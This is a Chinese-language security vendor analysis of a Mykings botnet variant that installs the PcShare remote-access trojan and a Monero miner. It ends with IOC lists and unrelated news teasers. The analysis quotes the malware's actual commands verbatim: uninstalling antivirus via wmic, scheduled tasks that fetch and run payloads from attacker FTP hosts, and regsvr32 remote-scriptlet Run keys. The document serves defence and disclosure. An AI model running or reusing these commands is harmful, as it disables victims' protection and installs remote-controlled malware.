Mykings 僵尸 *** 新变种通过 PcShare 远程控制,已感染超 5 万台电脑挖矿
最新版Mykings会在被感染系统安装开源远程控制木马PcShare,对受害电脑进行远程控制。Mykings僵尸 *** 木马还会关闭Windows Defender、检测卸载常见杀毒软件;卸载竞品挖矿木马和旧版挖矿木马;下载“暗云”木马感染硬盘主引导记录(MBR)实现长期驻留;通过计划任务、添加启动项等实现开机自动运行等行为。
一、背景
腾讯安全威胁情报中心检测到Mykings挖矿僵尸 *** 变种木马,更新后的Mykings会在被感染系统安装开源远程控制木马PcShare,对受害电脑进行远程控制:可进行操作文件、服务、注册表、进程、窗口等多种资源,并且可以下载和执行指定的程序。
Mykings僵尸 *** 木马还会关闭Windows Defender、检测卸载常见杀毒软件;卸载竞品挖矿木马和旧版挖矿木马;下载“暗云”木马感染硬盘主引导记录(MBR)实现长期驻留;通过计划任务、添加启动项等实现开机自动运行等行为。
MyKings僵尸 *** 最早于2017年2月左右开始出现,该僵尸 *** 通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机,然后传播包括DDoS、Proxy( *** 服务)、RAT(远程控制木马)、Miner(挖矿木马)、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸 *** 主动扩散的能力较强,影响范围较广,对企业用户危害严重。根据门罗币钱包算力1000KH/s进行推测,Mykings僵尸 *** 目前已控制超过5万台电脑进行挖矿作业。
腾讯安全系列产品已支持检测、清除Mykings僵尸 *** 的最新变种,具体响应清单如下:
胁
情
报
威胁情报云查服务
(SaaS)
各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics
高级威胁追溯系统
网管可通过威胁追溯系统,分析日志,进行线索研判、追溯 *** 入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts
防护
(Cloud Firewall,CFW)
1) Mykings僵尸 *** 关联的IOCs已支持识别检测;
2) 通过协议特征检测主机挖矿行为;
3) SQL Server弱口令爆破登陆行为检测;
有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw
(Cloud Workload Protection,CWP)
2) 云主机SQL Server弱口令风险项检测;
腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp
关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html
高级威胁检测系统
(腾讯御界)
2) 通过协议特征检测主机挖矿行为;
关于T-Sec高级威胁检测系统的更多信息,可参考:
https://cloud.tencent.com/product/nta
腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html
二、样本分析
mykings通过mssql爆破(1433端口)攻击windows服务器,爆破登陆成功后执行Powershell脚本power.txt。Power.txt首先关闭Windows Defender相关功能,然后下载kill.txt清除旧版挖矿程序。
Kill.txt根据进程名匹配旧版挖矿程序,其中标记为“1”代表清除对应的WMI启动项,列表中Mykings常用进程名包括:
uihost64.exe、dhelper.exe、msinfo.exe、u.exe、l *** ose.exe、l *** os.exe、l *** o.exe、csrw.exe、csrw.exe、l *** osee.exe、l *** ma.exe、l *** m.exe、l *** maa.exe、l *** ma.exe、new.exe、upsupx.exe、l *** a.exe、l *** ab.exe、l *** aaa.exe、l *** a30.exe、l *** a31.exe
删除旧版WMI事件过滤器“ *** youmm2_filter”、消费者“ *** youmm2_consumer”,从而删除WMI启动项。
2.1持久化
Power.txt接着下载uninstall.txt执行,完成卸载杀软、删除旧版挖矿木马、以及通过安装Windows计划任务、RUN启动项、WMI启动项进行本地持久化操作。
1、 卸载指定杀毒软件;
wmic.exe product where “name like ‘%Eset%'” call uninstall /nointeractive
wmic.exe product where “name like ‘%%Kaspersky%%'” call uninstall /nointeractive
wmic.exe product where “name like ‘%avast%'” call uninstall /nointeractive
wmic.exe product where “name like ‘%avp%'” call uninstall /nointeractive
wmic.exe product where “name like ‘%Security%'” call uninstall /nointeractive
wmic.exe product where “name like ‘%AntiVirus%'” call uninstall /nointeractive
wmic.exe product where “name like ‘%Norton Security%'” call uninstall /nointeractive
cmd /c “C:\Progra
1\Malwarebytes\Anti-Malware\unins000.exe” /verysilent /suppres *** sgboxes /norestart
2、安装计划任务“oka”启动新版挖矿木马l *** a12.exe,杀死进程java.exe;
schtasks /create /tn “oka” /tr “cmd /c start c:\windows\inf\aspnet\l *** a12.exe -p” /ru “system” /sc onstart /F
wmic.exe process where ExecutablePath=’c:\\windows\\java\\java.exe’ call Terminate
3、安装计划任务”Mysa”、”Mysa2″,在每次系统启动时执行命令,使用账号test密码1433登陆FTP服务器ftp[.]ftp0930[.]host下载木马a1.exe和s1.rar并执行;
schtasks /create /tn “Mysa” /tr “cmd /c echo open ftp.ftp0930.host >s
echo test>>s
echo 1433>>s
echo binary>>s
echo get a1.exe c:\windows\update.exe>>s
echo bye>>s
ftp -s:s
c:\windows\update.exe” /ru “system” /sc onstart /F
schtasks /create /tn “Mysa2” /tr “cmd /c echo open ftp.ftp0930.host>ps
echo test>>ps
echo 1433>>ps
echo get s1.rar c:\windows\help\l *** osee.exe>>ps
echo bye>>ps
ftp -s:ps
c:\windows\help\l *** osee.exe” /ru “system” /sc onstart /F
4、设置拒绝“system”用户访问指定文件和路径;
cacls c:\windows\java\java.exe /e /d system
cacls c:\windows\temp\servtestdos.dll /e /d system
cacls C:\WINDOWS\Fonts\cd /e /d system
5、安装RUN启动项“start”负责下载执行脚本v1.sct,同时删除旧启动项“start1”,删除旧计划任务“Mysa3”、“ok”、“Mysa1”、“my1”。
reg add “HKLM\Software\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll” /f
reg add “HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll” /f
reg delete HKlm\Software\Microsoft\Windows\CurrentVersion\Run /v “start1” /f
SCHTASKS /Delete /TN “Mysa3” /F
SCHTASKS /Delete /TN “ok” /F
SCHTASKS /Delete /TN “Mysa1” /F
SCHTASKS /Delete /TN “my1” /F
6、继续删除旧版的名称为“coronav”(新冠)的WMI启动项,同时安装新版的“coronav”WMI启动项,在其中通过Powershell下载和执行以下脚本:
http[:]//ruisgood.ru/power.txt
http[:]//gamesoxalic.com/power.txt
或者通过regsvr32下载和执行脚本:
http[:]//ruisgood.ru/s.txt
http[:]//gamesoxalic.com/s.txt
7、安装WMI启动项“ *** amm3”、“ *** amm4”启动新版挖矿木马程序:
8、Download.txt负责下载门罗币挖矿程序、Mykings更新程序和安装“暗云”木马感染程序:
2.2自更新
Download. *** 的ups.dat为自解压程序,解压后释放多个文件到temp目录下,执行竞品挖矿木马清除、挖矿木马下载和启动,以及安装启动项等更新操作。释放的文件包括:
c:\windows\temp\ntuser.dat
c:\windows\temp\upx.exe
%temp%\c3.bat
%temp%\excludes
%temp%\n.vbs
Download.txt 下载的“暗云”木马max.rar会感染MBR执行shellcode,从云端获取Payload并最终获取Mykings相关木马文件。下载Payload *** 流量如下:
首先从C2服务器http[:]//95.214.9.95/pld/cmd. *** cmd.txt。
然后向服务器(http[:]//95.214.9.95/pld/login.aspx?uid=***&info=***)发送上线信息,参数包括设备标识号uid和info,其中info包括计算机名、出口IP、CPU型号、CPU数量、内存大小信息,info数据经过base64编码,服务器接收数据后返回“AcceptOK”。
2.3 PcShare远控木马
返回数据cmd.txt中指定下载的20200809.rar为PcShare开源远控木马,该木马在github上有多个版本https[:]//github.com/LiveMirror/pcshare。木马下载后被拷贝至:
c:\windows\debug\item.dat,启动命令为:
rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa。
PcShare可根据服务端指令执行以下多种远控功能,该木马源代码在多个共享平台可供下载,黑客可以随意下载和重新修改编译。
1.枚举、创建、重命名、删除文件和目录
2.枚举和终止进程
3.编辑注册表项和值
4.枚举和修改服务
5.枚举和控制窗口
6.执行二进制文件
7.从C&C或提供的URL下载其他文件
8.将文件上传到C&C
9.执行shell命令
10.显示消息框
11.重新启动或关闭系统
PcShare连接C2服务器:192.187.111.66:5566。
2.4挖矿
Download.txt从地址http[:]//ruisgood.ru/1201.rar下载得到XMRig挖矿程序,从地址http[:]//ruisgood.ru/config2.json下载得到挖矿配置文件,然后启动挖矿进程:
c:\windows\inf\aspnet\l *** a12.exe
挖矿时使用矿池:xmr-eu1.nanopool.org:14444
门罗币钱包:
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka
查询该钱包,已挖矿获得143个XMR,折合人民币8万余元。而其矿池算力平均为1000Kh/s(盈利100美元/天),可推算约5万台电脑被控制挖矿。
IOCs
C&C
192.187.111.66:5566
95.214.9.95
Domain
ruisgood.ru
ftp.ftp0801.ru
gamesoxalic.com
ftp.ftp0930.host
js.down0116.info
js.mys2016.info
wmi.1217bye.host
js.5b6b7b.ru
up.mykings.pw
kriso.ru
f321y.com
down.f4321y.com
IP
199.168.100.74
173.247.239.186
174.128.235.243
223.25.247.152
167.88.180.175
139.5.177.10
173.247.239.186
185.239.227.82
URL
http[:]//ruisgood.ru/ups.dat
http[:]//ruisgood.ru/power.txt
http[:]//ruisgood.ru/1201.rar
http[:]//ruisgood.ru/uninstall.txt
http[:]//ruisgood.ru/max.rar
http[:]//ruisgood.ru/config2.json
http[:]//ruisgood.ru/s.txt
http[:]//ruisgood.ru/upx.exe
http[:]//ruisgood.ru/s.xsl
http[:]//ruisgood.ru/download2.txt
http[:]//ruisgood.ru/batpower.txt
http[:]//ruisgood.ru/ups.dat
http[:]//ruisgood.ru/download.txt
http[:]//ruisgood.ru/kill.txt
http[:]//ruisgood.ru/up.txt
http[:]//ruisgood.ru/wmi.txt
http[:]//ruisgood.ru/batpower.tx
http[:]//ruisgood.ru/up2.txt
http[:]//gamesoxalic.com/power.txt
http[:]//gamesoxalic.com/s.txt
ftp[:]//199.168.100.74/aa.exe
ftp[:]//199.168.100.74/1.dat
ftp[:]//ftp.ftp0801.ru/1.dat
ftp[:]//ftp.ftp0801.ru/aa.exe
ftp[:]//ftp.ftp0930.host/a1.exe
ftp[:]//ftp.ftp0930.host/s1.rar
http[:]//js.down0116.info:280/v1.sct
http[:]//174.128.235.243/wmi.txt
http[:]//174.128.235.243/upsupx2.exe
http[:]//174.128.235.243/u.exe
http[:]//199.168.100.74/20200809.rar
http[:]//199.168.100.74:8074/1201.rar
http[:]//173.247.239.186:9999/max.exe
http[:]//173.247.239.186:9999/u.exe
http[:]//185.239.227.82:8082/2.exe
http[:]//wmi.1217bye.host/S.ps1
http[:]//95.214.9.95/pld/cmd.txt
http[:]//223.25.247.152:8152/batpower.txt
http[:]//167.88.180.175:8175/kill.txt
http[:]//167.88.180.175:8175/uninstall.txt
http[:]//139.5.177.10:280/psa.jpg
http[:]//199.168.100.74/2.exe
http[:]//199.168.100.74:8074/2.exe
http[:]//173.247.239.186/2.exe
http[:]//185.239.227.82:8082/2.exe
http[:]//173.247.239.186:9999/2.exe
http[:]//js.5b6b7b.ru/v.sct
http[:]//js.5b6b7b.ru:280/v.sct
http[:]//up.mykings.pw/update.txt
http[:]//kriso.ru/java12.dat
http[:]//js.ftp0930.host/helloworld.msi
http[:]//f321y.com:8888/dhelper.dat
http[:]//down.f4321y.com:8888/kill.html
md5
门罗币钱包:
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka
参考链接:
https://www.freebuf.com/articles/193260.html
https://www.freebuf.com/articles/network/161286.html
https://blogs.blackberry.com/en/2019/09/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware
“Mykings 僵尸 *** 新变种通过 PcShare 远程控制,已感染超 5 万台电脑挖矿” 的相关文章
脸书被欧盟罚款 1.2 亿:大规模数据泄露
Facebook母公司Meta被欧盟罚款1700万欧元(约合1900万美元),原因是它未能阻止Facebook平台在2018年发生的一系列数据泄露事件,违反了欧盟的隐私规则。 Meta在欧盟的主要隐私监管机构爱尔兰数据保护委员会表示,他们发现Facebook“未能采取适当的技术和组织措施”。 20...
以色列政府数个网站遭遇网络攻击:现正从瘫痪中恢复
以色列似乎正在从一场大规模的网络攻击中恢复过来。据Haaretz和Kan的Amichai Stein报道,攻击者在周一晚上攻陷了几个以色列政府网站,其中包括卫生部、内政部、司法部和福利部网站。总理办公室的网站也受到了影响。以色列国家网络管理局在一份声明中称,现在所有的网站都已重新上线。 虽然以色列政...
设备接管风险警告!F5 发现一个关键 BIG-IP 远程执行漏洞
近日,应用交付领域(ADN)全球领导者F5公司发布了一项安全警告,其研究团队监测到一个关键漏洞正在被积极利用。漏洞的追踪代码为CVE-2022-1388,CVSS 3.0评分为9.8,危险等级非常高。该漏洞允许未经身份验证的网络攻击者执行任意系统命令,执行文件操作,并禁用BIG-IP上的服务。 根...
泄露的 Facebook 工程师文件承认违法使用用户数据 或将面临全球收入 4% 的罚款
Facebook正面临一场世界各地隐私法规“海啸”,这将迫使该公司大幅改变处理用户个人数据的方式。根据外媒获得的一份从Facebook泄露的文件,Facebook这场“劫难”的根源在于,他们自己都搞不清楚用户数据的用途和去向。 这份泄露的文件是由Facebook广告和商业产品团队的隐私工程师去...
FBI 向托管 Cyclops Blink 恶意软件的僵尸网络服务器发起了行动
美国联邦调查局(FBI)透露,该机构于今年 3 月发起了针对 GRU 控制的大型僵尸网络的专项行动。在获得加利福尼亚和宾夕法尼亚两州法院的授权后,FBI 清理了存在于指挥和控制服务器(C2S)上的所谓 Cyclops Blink 恶意软件,从而切断了其与受感染设备的连接。 本周三,美国司法部披露了...
安全人员发现 NSO 新的零点击攻击规避了苹果 iPhone 安全保护措施
公民实验室(Citizen Lab)的研究人员说,巴林人权活动家的iPhone今年早些时候被强大间谍软件悄悄入侵,打败了苹果公司为抵御秘密入侵而设计的新安全保护措施。这位仍在巴林并要求不透露姓名的活动人士是巴林人权中心的成员,该中心是一个获奖的非营利性组织,在海湾国家促进人权。 位于多伦多大学的互联...
评论列表
发表评论
